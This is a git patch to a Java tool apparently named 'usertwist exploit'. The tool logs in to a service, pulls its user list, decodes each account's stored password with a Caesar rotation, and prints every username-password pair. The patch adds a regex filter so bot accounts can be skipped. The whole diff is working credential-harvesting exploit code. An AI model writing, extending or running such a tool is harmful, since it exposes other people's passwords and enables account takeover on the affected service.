From b125e250bd2754e85e180a872e3182276340a37e Mon Sep 17 00:00:00 2001 From: Mateo Date: Wed, 7 Aug 2024 14:26:50 +0200 Subject: [PATCH] Added bot exclusion using regex --- src/fr/motysten/usertwist/exploit/Main.java | 9 +++-- .../usertwist/exploit/tools/Parser.java | 35 +++++++++++-------- 2 files changed, 28 insertions(+), 16 deletions(-) diff --git a/src/fr/motysten/usertwist/exploit/Main.java b/src/fr/motysten/usertwist/exploit/Main.java index f90780b..fceb939 100644 --- a/src/fr/motysten/usertwist/exploit/Main.java +++ b/src/fr/motysten/usertwist/exploit/Main.java @@ -26,6 +26,7 @@ public class Main { public static int rotation = 4; public static boolean asynchronous = true; public static Request requestClient; + public static boolean ignoreBots = true; public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException { BufferedReader reader = new BufferedReader(new InputStreamReader(System.in)); @@ -60,6 +61,10 @@ public class Main { readLine = reader.readLine(); if (!readLine.isEmpty()) {rotation = Integer.parseInt(readLine);} + System.out.println("Do you want to ignore bot users ? [Y/n]"); + readLine = reader.readLine(); + if (readLine.equalsIgnoreCase("n")) {ignoreBots = false;} + JSONObject requestJSON = new JSONObject(); requestJSON.put("username", username); requestJSON.put("password", password); @@ -132,9 +137,9 @@ public class Main { float startTime = System.nanoTime(); if (asynchronous) { - Parser.asyncGetPass(usersArray, rotation); + Parser.asyncGetPass(usersArray, rotation, ignoreBots); } else { - Parser.getPass(usersArray, rotation); + Parser.getPass(usersArray, rotation, ignoreBots); } float elapsedTime = (System.nanoTime() - startTime) / 1000000; System.out.println("Asynchronous elapsed time = " + elapsedTime + "ms"); diff --git a/src/fr/motysten/usertwist/exploit/tools/Parser.java b/src/fr/motysten/usertwist/exploit/tools/Parser.java index 79a525e..30747f7 100644 --- a/src/fr/motysten/usertwist/exploit/tools/Parser.java +++ b/src/fr/motysten/usertwist/exploit/tools/Parser.java @@ -3,35 +3,42 @@ package fr.motysten.usertwist.exploit.tools; import org.json.JSONArray; import org.json.JSONObject; +import java.util.regex.Matcher; +import java.util.regex.Pattern; + public class Parser { - public static void getPass(JSONArray usersArray, int rotation) { - for (int i = 0; i < usersArray.length(); i++) { - JSONObject user = usersArray.getJSONObject(i); - String login = user.getString("username"); - String password = Cesar.rotate(user.getString("data"), rotation); + private static final String regex = "(^[A-Z][A-Za-z]+[0-9][A-Z])|(^.*?([A-Z]|[0-9]{3}).*?[,?;.:/!§%*^¨$£+])"; + private static final Pattern pattern = Pattern.compile(regex); - System.out.println((i + 1) + ". " + login + " => " + password); + public static void getPass(JSONArray usersArray, int rotation, boolean ignoreBots) { + for (int i = 0; i < usersArray.length(); i++) { + parseJSON(usersArray, rotation, ignoreBots, i); } } - public static void asyncGetPass(JSONArray usersArray, int rotation) throws InterruptedException { + public static void asyncGetPass(JSONArray usersArray, int rotation, boolean ignoreBots) throws InterruptedException { for (int i = 0; i < usersArray.length(); i++) { int finalI = i; - Runnable r = () -> { - JSONObject user = usersArray.getJSONObject(finalI); - String login = user.getString("username"); - String password = Cesar.rotate(user.getString("data"), rotation); - - System.out.println((finalI + 1) + ". " + login + " => " + password); - }; + Runnable r = () -> parseJSON(usersArray, rotation, ignoreBots, finalI); Thread t = Thread.startVirtualThread(r); t.join(); } } + private static void parseJSON(JSONArray usersArray, int rotation, boolean ignoreBots, int finalI) { + JSONObject user = usersArray.getJSONObject(finalI); + String login = user.getString("username"); + String password = Cesar.rotate(user.getString("data"), rotation); + + final Matcher matcher = pattern.matcher(password); + if (!matcher.matches() || !ignoreBots) { + System.out.println((finalI + 1) + ". " + login + " => " + password); + } + } + }